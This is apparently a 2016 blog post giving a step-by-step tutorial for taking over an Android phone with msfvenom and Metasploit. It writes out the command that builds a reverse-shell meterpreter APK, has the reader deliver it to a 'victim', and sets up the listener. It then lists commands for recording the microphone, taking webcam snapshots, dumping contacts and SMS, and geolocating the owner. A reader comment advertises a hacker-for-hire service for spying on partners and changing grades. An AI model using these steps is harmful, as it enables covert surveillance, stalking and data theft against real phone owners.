Monday 11 July 2016

How To Hack Any Android Device Using Kali Linux [MATHOD-2]


Msfvenom Is A Kali Linux Hacking Tool For Android ,Is A Combination Of Msfpayload And Msfencode, Putting Both Of These Tools Into A Single Framework Instance Known As Msfvenom Payload.

Hacking With METASPLOIT In Kali Linux Is A Old Tool. Metasploit Is Enhanced By Msfvenom In Kali Linux. Metasploit Is Now A Outdated Tool.

So, let's get started... !!!

Follow These Simple Steps :

1. Fire Up kali and open command terminal.

2. Set payload and create custom windows executable.

Command:

root@kali:-# msfvenom -p android/meterpreter/reverse_tcp  LHOST=192.168.0.110 LPORT=4444 R > andro.apk
(To know your LHOST, open new terminal and type ifconfig )

Your apk file is being saved in the Home folder.

Note: Don't add any stray space characters anywhere. Use the command as is (after changing the LHOST and LPORT as needed).

3. Transfer/mail this file (here andro.apk) file to the victim's phone and install it.

4. Start the metasploit framework console as follows :
       
Command :

root@kali:-# msfconsole


5. Now it's time to open and setup multi-handler. Follows the steps :
msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
        Payload Handler is being started........

6. 
When the victims clicks on the app(installed as MAIN ACTIVITY in the menu) in his phone, meterpreter session will be established.

7. Try the following exploit commands :
    - record_mic
    - webcam_snap
    - webcam_stream
    - dump_contacts
    - dump_sms
    - geolocate

************************************************************************

Error fixing (incase you get PARSE ERROR)

Parse error : To fix this error download signapk - Click here to download

Steps To follow :
  • Open Signapk folder then open cmd.
  • Copy the andro.apk(the app you made) in Signapk folder.
  • Type java -" jar signapk.jar certificate.pem key.pk8 andro.apk andro-signed.apk "in cmd(not double quotes).
  • copy it in your phone and install it.
Hope this works... :)

Share the post with your friends...

Enjoy HACKiNG !!! :)

1 comment:

  1. CONTACT: onlineghosthacker247 @gmail. com
    -Find Out If Your Husband/Wife or Boyfriend/Girlfriend Is Cheating On You
    -Let them Help You Hack Any Website Or Database
    -Hack Into Any University Portal; To Change Your Grades Or Upgrade Any Personal Information/Examination Questions
    -Hack Email; Mobile Phones; Whatsapp; Text Messages; Call Logs; Facebook And Other Social Media Accounts
    -And All Related Services
    - let them help you in recovery any lost fund scam from you
    onlineghosthacker Will Get The Job Done For You
    onlineghosthacker247 @gmail. com
    TESTED AND TRUSTED!

    ReplyDelete